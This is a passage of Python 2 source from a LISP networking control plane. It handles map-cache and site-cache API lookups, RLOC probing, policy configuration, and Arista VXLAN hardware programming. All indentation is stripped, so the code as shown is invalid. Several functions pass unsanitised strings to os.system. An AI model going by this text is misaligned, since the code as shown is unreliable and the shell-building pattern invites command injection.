eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this map-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
gleaned_eid, do_probe = lisp_allow_gleaning(eid, None, parent_rloc)
if (gleaned_eid and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc, source, port, nonce, hop_count, ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
